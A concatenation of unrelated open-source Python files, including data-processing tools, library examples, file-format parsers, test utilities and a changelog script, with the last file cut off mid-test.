tasks: if task.ready(): if task.successful(): # Fetch task results and integrate into main counter counter = task.get()[0] main_counter.update(counter) tasks.remove(task) else: raise Exception('A worker process failed.') logging.info('Processed %s ZMWs.', main_counter['n_zmw_pass']) return tasks def main(unused_argv) -> None: if FLAGS.cpus == 1: raise ValueError('Must set cpus to 0 or >=2 for parallel processing.') is_training = FLAGS.truth_to_ccs and FLAGS.truth_bed and FLAGS.truth_split if not FLAGS.output.endswith('.tfrecord.gz'): raise ValueError('--output must end with .tfrecord.gz') if is_training: logging.info('Generating tf.Examples in training mode.') contig_split = utils.read_truth_split(FLAGS.truth_split) splits = set(contig_split.values()) for split in splits: if '@split' not in FLAGS.output: raise ValueError('You must add @split to --output when training.') elif FLAGS.truth_to_ccs or FLAGS.truth_bed or FLAGS.truth_split: err_msg = ('You must specify truth_to_ccs, truth_bed, and truth_split ' 'to generate a training dataset.') raise Exception(err_msg) else: logging.info('Generating tf.Examples in inference mode.') splits = ['inference'] manager = multiprocessing.Manager() queue = manager.Queue() dc_config = utils.DcConfig(max_passes=20, example_width=100, padding=20) proc_feeder, main_counter = utils.create_proc_feeder( subreads_to_ccs=FLAGS.subreads_to_ccs, ccs_fasta=FLAGS.ccs_fasta, dc_config=dc_config, truth_bed=FLAGS.truth_bed, truth_to_ccs=FLAGS.truth_to_ccs, truth_split=FLAGS.truth_split, limit=FLAGS.limit, bam_reader_threads=FLAGS.bam_reader_threads) if FLAGS.cpus == 0: logging.info('Using a single cpu.') tf_writers = setup_writers(FLAGS.output, splits) for args in proc_feeder(): tf_example_str_set, split, counter = process_subreads( *args, queue=None, local=True) write_tf_record(tf_example_str_set, split, tf_writers) # Update counter main_counter.update(counter) if main_counter['n_zmw_pass'] % 20 == 0: logging.info('Processed %s ZMWs.', main_counter['n_zmw_pass']) else: logging.info('Processing in parallel using %s cores', FLAGS.cpus) with multiprocessing.Pool(FLAGS.cpus) as pool: # Setup parallelization tf_writer = pool.apply_async(tf_record_writer, (FLAGS.output, splits, queue)) tasks = [] for args in proc_feeder(): tasks.append(pool.starmap_async(process_subreads, ([*args, queue],))) if main_counter['n_zmw_pass'] % 20 == 0: tasks = clear_tasks(tasks, main_counter) while tasks: time.sleep(0.5) tasks = clear_tasks(tasks, main_counter) # Cleanup multiprocessing. queue.put(['', 'kill']) tf_writer.get() manager.shutdown() pool.close() pool.join() # Write summary logging.info('Completed processing %s ZMWs.', main_counter['n_zmw_pass']) summary_name = 'training' if is_training else 'inference' dataset_summary = FLAGS.output.replace('.tfrecord.gz', f'.{summary_name}.json') # Remove @split from filenames dataset_summary = dataset_summary.replace('@split', 'summary') logging.info('Writing %s.', dataset_summary) make_dirs(dataset_summary) with open(dataset_summary, 'w') as summary_file: summary = dict(main_counter.items()) summary.update(dc_config.to_dict()) flag_list = [ 'subreads_to_ccs', 'ccs_fasta', 'truth_to_ccs', 'truth_bed', 'truth_split' ] for flag in flag_list: summary[flag] = FLAGS[flag].value summary['version'] = dc_constants.__version__ json_summary = json.dumps(summary, indent=True) summary_file.write(json_summary) if __name__ == '__main__': logging.use_python_logging() app.run(main)
labgraph/examples/simple_viz_zmq.py
Yunusbcr/labgraph
124
12635392
<filename>labgraph/examples/simple_viz_zmq.py #!/usr/bin/env python3 # Copyright 2004-present Facebook. All Rights Reserved. # Built-in imports import asyncio from labgraph.zmq_node.zmq_message import ZMQMessage from labgraph.zmq_node.zmq_poller_node import ZMQPollerConfig import time from dataclasses import field from typing import Any, List, Optional, Tuple # Import labgraph import labgraph as lg from labgraph.zmq_node import ZMQPollerNode # Imports required for this example import matplotlib.animation as animation import matplotlib.axes import matplotlib.pyplot as plt import numpy as np # Constants used by nodes NUM_FEATURES = 100 WINDOW = 2.0 REFRESH_RATE = 2.0 ENDPOINT = "tcp://localhost:5555" # For ZMQ TOPIC = "randomstream" # For ZMQ # A data type used in streaming, see docs: Messages class RandomMessage(lg.Message): timestamp: float data: np.ndarray # ================================= ZMQ deserializer ================================== # A shim to feed ZMQ data to the rolling averager class ZMQDeserializer(lg.Node): INPUT = lg.Topic(ZMQMessage) OUTPUT = lg.Topic(RandomMessage) # Take the raw data and reify it to a RandomMessage @lg.subscriber(INPUT) @lg.publisher(OUTPUT) async def deserialize(self, message: ZMQMessage) -> lg.AsyncPublisher: yield self.OUTPUT, RandomMessage(timestamp=time.time(), data=np.frombuffer(message.data)) # ================================= ROLLING AVERAGER =================================== # The state of the RollingAverager node: holds windowed messages class RollingState(lg.State): messages: List[RandomMessage] = field(default_factory=list) # Configuration for RollingAverager class RollingConfig(lg.Config): window: float # Window, in seconds, to average over # A transformer node that accepts some data on an input topic and averages that data # over the configured window to its output topic class RollingAverager(lg.Node): INPUT = lg.Topic(RandomMessage) OUTPUT = lg.Topic(RandomMessage) state: RollingState config: RollingConfig # A transformer method that transforms data from one topic into another @lg.subscriber(INPUT) @lg.publisher(OUTPUT) async def average(self, message: RandomMessage) -> lg.AsyncPublisher: current_time = time.time() self.state.messages.append(message) self.state.messages = [ message for message in self.state.messages if message.timestamp >= current_time - self.config.window ] if len(self.state.messages) == 0: return all_data = np.stack([message.data for message in self.state.messages]) mean_data = np.mean(all_data, axis=0) yield self.OUTPUT, RandomMessage(timestamp=current_time, data=mean_data) # ================================== AVERAGED NOISE ==================================== # Configuration for AveragedNoise class AveragedNoiseConfig(lg.Config): num_features: int # Number of features to generate window: float # Window, in seconds, to average over read_addr: str zmq_topic: str poll_time: float # A group that combines noise generation and rolling averaging. The output topic # contains averaged noise. We could just put all three nodes in a graph below, but we # add this group to demonstrate the grouping functionality. class AveragedNoise(lg.Group): OUTPUT = lg.Topic(RandomMessage) config: AveragedNoiseConfig ZMQ: ZMQPollerNode ZMQ_DESERIALIZER: ZMQDeserializer ROLLING_AVERAGER: RollingAverager def connections(self) -> lg.Connections: # To produce averaged noise, we connect the noise generator to the averager # Then we "expose" the averager's output as an output of this group return ( (self.ZMQ.topic, self.ZMQ_DESERIALIZER.INPUT), (self.ZMQ_DESERIALIZER.OUTPUT, self.ROLLING_AVERAGER.INPUT), (self.ROLLING_AVERAGER.OUTPUT, self.OUTPUT), ) def setup(self) -> None: # Cascade this group's configuration to its contained nodes self.ZMQ.configure( ZMQPollerConfig( read_addr=self.config.read_addr, zmq_topic=self.config.zmq_topic, poll_time=self.config.poll_time ) ) self.ROLLING_AVERAGER.configure(RollingConfig(window=self.config.window)) # ======================================= PLOT ========================================= # The state of the Plot: holds the most recent data received, which should be displayed class PlotState(lg.State): data: Optional[np.ndarray] = None # The configuration for the Plot class PlotConfig(lg.Config): refresh_rate: float # How frequently to refresh the bar graph num_bars: int # The number of bars to display (note this should be == num_features) # A node that creates a matplotlib bar graph that displays the produced data in # real-time class Plot(lg.Node): INPUT = lg.Topic(RandomMessage) state: PlotState config: PlotConfig def setup(self) -> None: self.ax: Optional[matplotlib.axes.Axes] = None # A subscriber method that simply receives data and updates the node's state @lg.subscriber(INPUT) def got_message(self, message: RandomMessage) -> None: self.state.data = message.data # A main method does not interact with topics, but has its own line of execution - # this can be useful for Python libraries that must be run in the main thread. For # example, scikit-learn and pyqtgraph are libraries that need the main thread. @lg.main def run_plot(self) -> None: fig = plt.figure() self.ax = fig.add_subplot(1, 1, 1) self.ax.set_ylim((0, 1)) anim = animation.FuncAnimation( # noqa: F841 fig, self._animate, interval=1 / self.config.refresh_rate * 1000 ) plt.show() raise lg.NormalTermination() def _animate(self, i: int) -> None: if self.ax is None or self.state.data is None: return self.ax.clear() self.ax.set_ylim([0, 1]) self.ax.bar(range(self.config.num_bars), self.state.data) # ======================================= DEMO ========================================= # A graph for the demo in this example. Hooks together the AveragedNoise group # (containing NoiseGenerator and RollingAverager) and the Plot node. class Demo(lg.Graph): AVERAGED_NOISE: AveragedNoise PLOT: Plot def setup(self) -> None: # Provide configuration using global constants (but if we wanted to, we could # have a configuration object provided to this graph as well). self.AVERAGED_NOISE.configure( AveragedNoiseConfig( num_features=NUM_FEATURES, window=WINDOW, read_addr=ENDPOINT, zmq_topic=TOPIC, poll_time=1.0 ) ) self.PLOT.configure( PlotConfig(refresh_rate=REFRESH_RATE, num_bars=NUM_FEATURES) ) # Connect the AveragedNoise output to the Plot input def connections(self) -> lg.Connections: return ((self.AVERAGED_NOISE.OUTPUT, self.PLOT.INPUT),) # Parallelization: Run AveragedNoise and Plot in separate processes def process_modules(self) -> Tuple[lg.Module, ...]: return (self.AVERAGED_NOISE, self.PLOT) # Entry point: run the Demo graph # This demo does the same thing as simple_viz.py, but uses a zmq source (zmq_source.py) rather # than a hardcoded source. if __name__ == "__main__": print("Initializing ZMQ demo - please run zmq_source.py in another terminal.") lg.run(Demo)
consulate/models/base.py
Beahmer89/consulate
309
12635396
<gh_stars>100-1000 # coding=utf-8 """ Base Model """ import collections class Model(collections.Iterable): """A model contains an __attribute__ map that defines the name, its type for type validation, an optional validation method, a method used to .. python:: class MyModel(Model): __attributes__ = { 'ID': { 'type': uuid.UUID, 'required': False, 'default': None, 'cast_from': str, 'cast_to': str }, 'Serial': { 'type': int 'required': True, 'default': 0, 'validator': lambda v: v >= 0 end, } } """ __attributes__ = {} """The attributes that define the data elements of the model""" def __init__(self, **kwargs): super(Model, self).__init__() [setattr(self, name, value) for name, value in kwargs.items()] [self._set_default(name) for name in self.__attributes__.keys() if name not in kwargs.keys()] def __iter__(self): """Iterate through the model's key, value pairs. :rtype: iterator """ for name in self.__attributes__.keys(): value = self._maybe_cast_value(name) if value is not None: yield self._maybe_return_key(name), value def __setattr__(self, name, value): """Set the value for an attribute of the model, validating the attribute name and its type if the type is defined in ``__types__``. :param str name: The attribute name :param mixed value: The value to set :raises: AttributeError :raises: TypeError :raises: ValueError """ if name not in self.__attributes__: raise AttributeError('Invalid attribute "{}"'.format(name)) value = self._validate_value(name, value) super(Model, self).__setattr__(name, value) def __getattribute__(self, name): """Return the attribute from the model if it is set, otherwise returning the default if one is set. :param str name: The attribute name :rtype: mixed """ try: return super(Model, self).__getattribute__(name) except AttributeError: if name in self.__attributes__: return self.__attributes__[name].get('default', None) raise def _maybe_cast_value(self, name): """Return the attribute value, possibly cast to a different type if the ``cast_to`` item is set in the attribute definition. :param str name: The attribute name :rtype: mixed """ value = getattr(self, name) if value is not None and self.__attributes__[name].get('cast_to'): return self.__attributes__[name]['cast_to'](value) return value def _maybe_return_key(self, name): """Return the attribute name as specified in it's ``key`` definition, if specified. This is to map python attribute names to their Consul alternatives. :param str name: The attribute name :rtype: mixed """ if self.__attributes__[name].get('key'): return self.__attributes__[name]['key'] return name def _required_attr(self, name): """Returns :data:`True` if the attribute is required. :param str name: The attribute name :rtype: bool """ return self.__attributes__[name].get('required', False) def _set_default(self, name): """Set the default value for the attribute name. :param str name: The attribute name """ setattr(self, name, self.__attributes__[name].get('default', None)) def _validate_value(self, name, value): """Ensures the the value validates based upon the type or a validation function, raising an error if it does not. :param str name: The attribute name :param mixed value: The value that is being set :rtype: mixed :raises: TypeError :raises: ValueError """ if value is None: if self._required_attr(name): raise ValueError('Attribute "{}" is required'.format(name)) return if not isinstance(value, self.__attributes__[name].get('type')): cast_from = self.__attributes__[name].get('cast_from') if cast_from and isinstance(value, cast_from): value = self.__attributes__[name]['type'](value) else: raise TypeError( 'Attribute "{}" must be of type {} not {}'.format( name, self.__attributes__[name]['type'].__name__, value.__class__.__name__)) if self.__attributes__[name].get('enum') \ and value not in self.__attributes__[name]['enum']: raise ValueError( 'Attribute "{}" value {!r} not valid'.format(name, value)) validator = self.__attributes__[name].get('validator') if callable(validator): if not validator(value, self): raise ValueError( 'Attribute "{}" value {!r} did not validate'.format( name, value)) return value
examples/batch_normalization/mnist_baseline.py
uaca/deepy
260
12635407
#!/usr/bin/env python # -*- coding: utf-8 -*- """ This experiment setting is described in http://arxiv.org/pdf/1502.03167v3.pdf. MNIST MLP baseline model. Gaussian initialization described in the paper did not convergence, I have no idea. """ import logging, os logging.basicConfig(level=logging.INFO) from deepy.dataset import MnistDataset, MiniBatches from deepy.networks import NeuralClassifier from deepy.layers import Dense, Softmax from deepy.trainers import SGDTrainer default_model = os.path.join(os.path.dirname(__file__), "models", "baseline1.gz") if __name__ == '__main__': model = NeuralClassifier(input_dim=28 * 28) model.stack(Dense(100, 'sigmoid'), Dense(100, 'sigmoid'), Dense(100, 'sigmoid'), Dense(10, 'linear'), Softmax()) trainer = SGDTrainer(model) batches = MiniBatches(MnistDataset(), batch_size=60) trainer.run(batches, epoch_controllers=[]) model.save_params(default_model)
src/super_gradients/common/decorators/deci_logger.py
Deci-AI/super-gradients
308
12635422
<filename>src/super_gradients/common/decorators/deci_logger.py def deci_func_logger(_func=None, *, name: str = 'abstract_decorator'): """ This decorator is used to wrap our functions with logs. It will log every enter and exit of the functon with the equivalent parameters as extras. It will also log exceptions that raises in the function. It will also log the exception time of the function. How it works:` First it will check if the decorator called with name keyword. If so it will return a new decorator that its logger is the name parameter. If not it will return a new decorator that its logger is the wrapped function name. Then the return decorator will return a new function that warps the original function with the new logs. For further understanding advise real-python "fancy decorators documentation" Args: _func (): used when called without name specify. dont pass it directly name (): The name of the logger to save logs by. Returns: a decorator that wraps function with logs logic. """ # TODO: Not Working - Breaks the code, tests does not pass (s3 connector, platform...) # TODO: Fix problem with ExplicitParamValidation error (arguments not passed) # TODO: Run ALL test suite of deci2 (NOT circieCI test suite, but ALL the tests under tests folders) # TODO: Delete/Update all failing tests. # def deci_logger_decorator(fn): # # @functools.wraps(fn) # def wrapper_func(*args, **kwargs): # try: # # try: # logger.debug(f"Start: {fn.__name__}", extra={"args": args, "kwargs": kwargs}) # time1 = time.perf_counter() # except Exception: # # failed to write log - continue. # pass # # result = fn(*args, **kwargs) # # try: # time2 = time.perf_counter() # logger.debug(f"End: {fn.__name__}", # extra={'duration': (time2 - time1) * 1000.0, 'return_value': result}) # except Exception: # # failed to write log - continue. # pass # # return result # # except Exception as ex: # # This exception was raised from inside the function call # logger.error(f"Exception: {ex}", exc_info=ex) # raise ex # # return wrapper_func # if _func is None: # logger = get_logger(name) # return deci_logger_decorator # else: # logger = get_logger(_func.__name__) # return deci_logger_decorator(_func) return _func def deci_class_logger(): """ This decorator wraps every class method with deci_func_logger decorator. It works by checking if class method is callable and if so it will set a new decorated method as the same method name. """ def wrapper(cls): # TODO: Not Working - Breaks the code, tests does not pass (s3 connector, platform...) # TODO: Fix problem with ExplicitParamValidation error (arguments not passed) # TODO: Run ALL test suite of deci2 (NOT circieCI test suite, but ALL the tests under tests folders) # TODO: Delete/Update all failing tests. # for attr in cls.__dict__: # if callable(getattr(cls, attr)) and attr != '__init__': # decorated_function = deci_func_logger(name=cls.__name__)(getattr(cls, attr)) # if type(cls.__dict__[attr]) is staticmethod: # decorated_function = staticmethod(decorated_function) # setattr(cls, attr, decorated_function) return cls return wrapper
examples/http_redirect.py
Varriount/sanic
1,883
12635440
from sanic import Sanic, response, text from sanic.handlers import ErrorHandler from sanic.server.async_server import AsyncioServer HTTP_PORT = 9999 HTTPS_PORT = 8888 http = Sanic("http") http.config.SERVER_NAME = f"localhost:{HTTP_PORT}" https = Sanic("https") https.config.SERVER_NAME = f"localhost:{HTTPS_PORT}" @https.get("/foo") def foo(request): return text("foo") @https.get("/bar") def bar(request): return text("bar") @http.get("/<path:path>") def proxy(request, path): url = request.app.url_for( "proxy", path=path, _server=https.config.SERVER_NAME, _external=True, _scheme="http", ) return response.redirect(url) @https.main_process_start async def start(app, _): http_server = await http.create_server( port=HTTP_PORT, return_asyncio_server=True ) app.add_task(runner(http, http_server)) app.ctx.http_server = http_server app.ctx.http = http @https.main_process_stop async def stop(app, _): await app.ctx.http_server.before_stop() await app.ctx.http_server.close() for connection in app.ctx.http_server.connections: connection.close_if_idle() await app.ctx.http_server.after_stop() app.ctx.http = False async def runner(app: Sanic, app_server: AsyncioServer): app.is_running = True try: app.signalize() app.finalize() ErrorHandler.finalize(app.error_handler) app_server.init = True await app_server.before_start() await app_server.after_start() await app_server.serve_forever() finally: app.is_running = False app.is_stopping = True https.run(port=HTTPS_PORT, debug=True)
library/source1/bsp/lumps/vertex_lump.py
BlenderAddonsArchive/SourceIO
199
12635527
import numpy as np from .. import Lump, lump_tag @lump_tag(3, 'LUMP_VERTICES') class VertexLump(Lump): def __init__(self, bsp, lump_id): super().__init__(bsp, lump_id) self.vertices = np.array([]) def parse(self): reader = self.reader self.vertices = np.frombuffer(reader.read(), np.float32) self.vertices = self.vertices.reshape((-1, 3)) return self @lump_tag(0x47, 'LUMP_UNLITVERTEX', bsp_version=29) class UnLitVertexLump(Lump): _dtype = np.dtype( [ ('vpi', np.uint32, (1,)), ('vni', np.uint32, (1,)), ('uv', np.float32, (2,)), ('unk', np.int32, (1,)), ] ) def __init__(self, bsp, lump_id): super().__init__(bsp, lump_id) self.vertex_info = np.array([]) def parse(self): reader = self.reader self.vertex_info = np.frombuffer(reader.read(), self._dtype) return self @lump_tag(0x49, 'LUMP_BUMPLITVERTEX', bsp_version=29) class BumpLitVertexLump(Lump): _dtype = np.dtype( [ ('vpi', np.uint32, (1,)), ('vni', np.uint32, (1,)), ('uv', np.float32, (2,)), ('unk1', np.int32, (1,)), ('uv_lm', np.float32, (2,)), ('uv1', np.float32, (2,)), ('unk2', np.uint32, (2,)), ] ) def __init__(self, bsp, lump_id): super().__init__(bsp, lump_id) self.vertex_info = np.array([]) def parse(self): reader = self.reader self.vertex_info = np.frombuffer(reader.read(), self._dtype) return self @lump_tag(0x4a, 'LUMP_UNLITTSVERTEX', bsp_version=29) class UnlitTSVertexLump(Lump): _dtype = np.dtype( [ ('vpi', np.uint32, (3,)), ('vni', np.uint32, (1,)), ('uv', np.float32, (2,)), ] ) def __init__(self, bsp, lump_id): super().__init__(bsp, lump_id) self.vertex_info = np.array([]) def parse(self): reader = self.reader self.vertex_info = np.frombuffer(reader.read(), self._dtype) return self @lump_tag(0x4B, 'LUMP_BLINNPHONGVERTEX', bsp_version=29) class BlinnPhongVertexLump(Lump): _dtype = np.dtype( [ ('vpi', np.uint32, (3,)), ('vni', np.uint32, (1,)), ('unk', np.uint32, (2,)), ] ) def __init__(self, bsp, lump_id): super().__init__(bsp, lump_id) self.vertex_info = np.array([]) def parse(self): reader = self.reader self.vertex_info = np.frombuffer(reader.read(), self._dtype) return self @lump_tag(0x4C, 'LUMP_R5VERTEX', bsp_version=29) class R5VertexLump(Lump): _dtype = np.dtype( [ ('vpi', np.uint32, (3,)), ('vni', np.uint32, (1,)), ('unk', np.uint32, (2,)), ('uv', np.float32, (2,)), ('uv_lm', np.float32, (2,)), ] ) def __init__(self, bsp, lump_id): super().__init__(bsp, lump_id) self.vertex_info = np.array([]) def parse(self): reader = self.reader self.vertex_info = np.frombuffer(reader.read(), self._dtype) return self @lump_tag(0x4E, 'LUMP_R7VERTEX', bsp_version=29) class R7VertexLump(Lump): _dtype = np.dtype( [ ('vpi', np.uint32, (3,)), ('vni', np.uint32, (1,)), ('uv', np.float32, (2,)), ('neg_one', np.int32, (1,)), ] ) def __init__(self, bsp, lump_id): super().__init__(bsp, lump_id) self.vertex_info = np.array([]) def parse(self): reader = self.reader self.vertex_info = np.frombuffer(reader.read(), self._dtype) return self
dfvfs/compression/bzip2_decompressor.py
dfjxs/dfvfs
176
12635533
<gh_stars>100-1000 # -*- coding: utf-8 -*- """The BZIP2 decompressor implementation.""" import bz2 from dfvfs.compression import decompressor from dfvfs.compression import manager from dfvfs.lib import definitions from dfvfs.lib import errors class BZIP2Decompressor(decompressor.Decompressor): """BZIP2 decompressor using bz2.""" COMPRESSION_METHOD = definitions.COMPRESSION_METHOD_BZIP2 def __init__(self): """Initializes a decompressor.""" super(BZIP2Decompressor, self).__init__() self._bz2_decompressor = bz2.BZ2Decompressor() def Decompress(self, compressed_data): """Decompresses the compressed data. Args: compressed_data (bytes): compressed data. Returns: tuple(bytes, bytes): uncompressed data and remaining compressed data. Raises: BackEndError: if the BZIP2 compressed stream cannot be decompressed. """ try: uncompressed_data = self._bz2_decompressor.decompress(compressed_data) remaining_compressed_data = getattr( self._bz2_decompressor, 'unused_data', b'') except (EOFError, IOError) as exception: raise errors.BackEndError(( 'Unable to decompress BZIP2 compressed stream with error: ' '{0!s}.').format(exception)) return uncompressed_data, remaining_compressed_data manager.CompressionManager.RegisterDecompressor(BZIP2Decompressor)
tests/protocols/http/twisted_web_test_utils.py
paradiseng/jasmin
750
12635534
# https://gist.github.com/1873035#file_twisted_web_test_utils.py import json from io import StringIO from twisted.internet.defer import succeed from twisted.web import server, http_headers from twisted.web.test.test_web import DummyRequest from twisted.web.http import Request class SmartDummyRequest(DummyRequest): def __init__(self, method, url, args=None, json_data=None, headers=None): DummyRequest.__init__(self, url.split(b'/')) self.method = method self.requestHeaders = http_headers.Headers(headers or {}) # set args args = args or {} for k, v in args.items(): if isinstance(k, str): k = k.encode() if isinstance(v, str): v = v.encode() self.addArg(k, v) if json_data is not None: self.content = StringIO(json.dumps(json_data)) else: self.content = None def value(self): return b"".join(self.written) class DummySite(server.Site): def get(self, url, args=None): return self._request(b"GET", url, args) def post(self, url, args=None, json_data=None, headers=None): if json_data is not None: return self._request_json(b"POST", url, json_data, headers=headers) else: return self._request(b"POST", url, args, headers=headers) def _request(self, method, url, args, headers=None): request = SmartDummyRequest(method, url, args, headers=headers) resource = self.getResourceFor(request) result = resource.render(request) return self._resolveResult(request, result) def _request_json(self, method, url, json_data, headers=None): request = SmartDummyRequest(method, url, json_data=json_data, headers=headers) resource = self.getResourceFor(request) result = resource.render(request) return self._resolveResult(request, result) def _resolveResult(self, request, result): if isinstance(result, str): request.write(result.encode()) request.finish() return succeed(request) elif isinstance(result, bytes): request.write(result) request.finish() return succeed(request) elif result is server.NOT_DONE_YET: if request.finished: return succeed(request) else: return request.notifyFinish().addCallback(lambda _: request) else: raise ValueError("Unexpected return value: %r" % (result,))
tests/extra/polar.py
aluhrs13/HPI
1,026
12635575
<gh_stars>1000+ from pathlib import Path import sys from importlib import reload from my.core.common import get_valid_filename ROOT = Path(__file__).parent.absolute() OUTPUTS = ROOT / 'outputs' import pytest # type: ignore def test_hpi(prepare: str) -> None: from my.polar import get_entries assert len(list(get_entries())) > 1 def test_orger(prepare: str, tmp_path: Path) -> None: from my.core.common import import_from, import_file om = import_file(ROOT / 'orger/modules/polar.py') # reload(om) pv = om.PolarView() # type: ignore # TODO hmm. worth making public? OUTPUTS.mkdir(exist_ok=True) out = OUTPUTS / (get_valid_filename(prepare) + '.org') pv._run(to=out) PARAMS = [ # 'data/polar/BojanKV_polar/.polar', '', # 'data/polar/TheCedarPrince_KnowledgeRepository', # 'data/polar/coelias_polardocs', # 'data/polar/warkdarrior_polar-document-repository' ] @pytest.fixture(params=PARAMS) def prepare(request): dotpolar = request.param class user_config: if dotpolar != '': # defaul polar_dir = Path(ROOT / dotpolar) defensive = False import my.config setattr(my.config, 'polar', user_config) import my.polar as polar reload(polar) # TODO hmm... ok, need to document reload() yield dotpolar
webhook/plugins/base.py
nobgr/xray
7,086
12635580
import logging from cached_property import cached_property from model.plugin import PluginMeta from model.vuln import Statistics, WebVuln, ServiceVuln class BasePlugin: @cached_property def meta(self) -> PluginMeta: raise NotImplementedError("you should implement this method in your subclass") @cached_property def logger(self): return logging.getLogger("plugin:" + self.meta.key) def process_web_vuln(self, instance: str, vuln: WebVuln): pass def process_service_vuln(self, instance: str, vuln: ServiceVuln): pass def process_statistics(self, instance: str, statistics: Statistics): pass
chocolate/mo/__init__.py
Intelecy/chocolate
105
12635621
from collections import defaultdict import numpy try: # try importing the C version and set docstring from .hv import hypervolume as __hv except ImportError: # fallback on python version from .pyhv import hypervolume as __hv def argsortNondominated(losses, k, first_front_only=False): """Sort input in Pareto-equal groups. Sort the first *k* *losses* into different nondomination levels using the "Fast Nondominated Sorting Approach" proposed by Deb et al., see [Deb2002]_. This algorithm has a time complexity of :math:`O(MN^2)`, where :math:`M` is the number of objectives and :math:`N` the number of losses. :param losses: A list of losses to select from. :param k: The number of elements to select. :param first_front_only: If :obj:`True` sort only the first front and exit. :returns: A list of Pareto fronts (lists) containing the losses index. .. [Deb2002] Deb, Pratab, Agarwal, and Meyarivan, "A fast elitist non-dominated sorting genetic algorithm for multi-objective optimization: NSGA-II", 2002. """ if k == 0: return [] loss2c = defaultdict(list) for i, c in enumerate(losses): loss2c[tuple(c)].append(i) losses_keys = list(loss2c.keys()) current_front = [] next_front = [] dominating_losses = defaultdict(int) dominated_losses = defaultdict(list) # Rank first Pareto front for i, li in enumerate(losses_keys): for lj in losses_keys[i+1:]: if dominates(li, lj): dominating_losses[lj] += 1 dominated_losses[li].append(lj) elif dominates(lj, li): dominating_losses[li] += 1 dominated_losses[lj].append(li) if dominating_losses[li] == 0: current_front.append(li) fronts = [[]] for loss in current_front: fronts[0].extend(loss2c[loss]) pareto_sorted = len(fronts[0]) if first_front_only: return fronts[0] # Rank the next front until at least the requested number # candidates are sorted N = min(len(losses), k) while pareto_sorted < N: fronts.append([]) for lp in current_front: for ld in dominated_losses[lp]: dominating_losses[ld] -= 1 if dominating_losses[ld] == 0: next_front.append(ld) pareto_sorted += len(loss2c[ld]) fronts[-1].extend(loss2c[ld]) current_front = next_front next_front = [] return fronts def dominates(loss1, loss2, obj=slice(None)): """Returns wether or not loss1 dominates loss2, while minimizing all objectives. """ not_equal = False for l1i, l2i in zip(loss1[obj], loss2[obj]): if l1i < l2i: not_equal = True elif l1i > l2i: return False return not_equal def hypervolume(pointset, ref): """Computes the hypervolume of a point set. Args: pointset: A list of points. ref: The origin from which to comute the hypervolume. This value should be larger than all values in the point set. Returns: The hypervolume of this point set. """ return __hv(pointset, ref) def hypervolume_indicator(front, **kargs): """Indicator function using the hypervolume value. Computes the contribution of each of the front candidates to the front hypervolume. The hypervolume indicator assumes minimization. Args: front: A list of Pareto equal candidate solutions. ref: The origin from which to compute the hypervolume (optional). If not given, ref is set to the maximum value in each dimension + 1. Returns: The index of the least contributing candidate. """ # Hypervolume use implicit minimization obj = numpy.array(front) ref = kargs.get("ref", None) if ref is None: ref = numpy.max(obj, axis=0) + 1 def contribution(i): # The contribution of point p_i in point set P # is the hypervolume of P without p_i return hypervolume(numpy.concatenate((obj[:i], obj[i+1:])), ref) contrib_values = map(contribution, range(len(front))) # Select the maximum hypervolume value (correspond to the minimum difference) return numpy.argmax(contrib_values)
docs/release/changelog.py
oneconvergence/katib
1,177
12635644
from github import Github import argparse REPO_NAME = "kubeflow/katib" CHANGELOG_FILE = "CHANGELOG.md" parser = argparse.ArgumentParser() parser.add_argument("--token", type=str, help="GitHub Access Token") parser.add_argument("--range", type=str, help="Changelog is generated for this release range") args = parser.parse_args() if args.token is None: raise Exception("GitHub Token must be set") try: previous_release = args.range.split("..")[0] current_release = args.range.split("..")[1] except Exception: raise Exception("Release range must be set in this format: v0.11.0..v0.12.0") # Get list of commits from the range. github_repo = Github(args.token).get_repo(REPO_NAME) comparison = github_repo.compare(previous_release, current_release) commits = comparison.commits # The latest commit contains the release date. release_date = str(commits[-1].commit.author.date).split(" ")[0] release_url = "https://github.com/{}/tree/{}".format(REPO_NAME, current_release) # Get all PRs in reverse chronological order from the commits. pr_list = "" pr_set = set() for commit in reversed(commits): # Only add commits with PRs. for pr in commit.get_pulls(): # Each PR is added only one time to the list. if pr.number in pr_set: continue pr_set.add(pr.number) new_pr = "- {title} ([#{id}]({pr_link}) by [@{user_id}]({user_url}))\n".format( title=pr.title, id=pr.number, pr_link=pr.html_url, user_id=pr.user.login, user_url=pr.user.html_url ) pr_list += new_pr change_log = [ "# Changelog" "\n\n", "## [{}]({}) ({})".format(current_release, release_url, release_date), "\n\n", "## TODO: Group PRs into Features, Bug fixes, Documentation, etc. " + "For example: [v0.11.0](https://github.com/kubeflow/katib/releases/tag/v0.11.0)", "\n\n", pr_list, "\n" "[Full Changelog]({})\n".format(comparison.html_url)] # Update Changelog with the new changes. with open(CHANGELOG_FILE, "r+") as f: lines = f.readlines() f.seek(0) lines = lines[0:0] + change_log + lines[1:] f.writelines(lines) print("Changelog has been updated\n") print("Group PRs in the Changelog into Features, Bug fixes, Documentation, etc.\n") print("After that, submit a PR with the updated Changelog")
mahotas/tests/test_freeimage.py
odidev/mahotas
541
12635646
import numpy as np from os import path try: from mahotas.io import freeimage except OSError: import pytest pytestmark = pytest.mark.skip def test_freeimage(tmpdir): img = np.arange(256).reshape((16,16)).astype(np.uint8) fname = tmpdir.join('mahotas_test.png') freeimage.imsave(fname, img) img_ = freeimage.imread(fname) assert img.shape == img_.shape assert np.all(img == img_) def test_as_grey(tmpdir): fname = tmpdir.join('mahotas_test.png') colour = np.arange(16*16*3).reshape((16,16,3)) freeimage.imsave(fname, colour.astype(np.uint8)) c2 = freeimage.imread(fname, as_grey=True) assert len(c2.shape) == 2 assert c2.shape == colour.shape[:-1] def test_rgba(): rgba = path.join( path.dirname(__file__), 'data', 'rgba.png') rgba = freeimage.imread(rgba) assert np.all(np.diff(rgba[:,:,3].mean(1)) < 0 ) # the image contains an alpha gradient def test_save_load_rgba(tmpdir): fname = tmpdir.join('mahotas_test.png') img = np.arange(256).reshape((8,8,4)).astype(np.uint8) freeimage.imsave(fname, img) img_ = freeimage.imread(fname) assert img.shape == img_.shape assert np.all(img == img_) def test_fromblob(): img = np.arange(100, dtype=np.uint8).reshape((10,10)) s = freeimage.imsavetoblob(img, 't.png') assert np.all(freeimage.imreadfromblob(s) == img) s = freeimage.imsavetoblob(img, 't.bmp') assert np.all(freeimage.imreadfromblob(s) == img) def test_1bpp(): bpp = path.join( path.dirname(__file__), 'data', '1bpp.bmp') bpp = freeimage.imread(bpp) assert bpp.sum() assert bpp.sum() < bpp.size def test_multi(tmpdir): testtif = tmpdir.join('/mahotas_test.tif') f = np.zeros((16,16), np.uint8) fs = [] 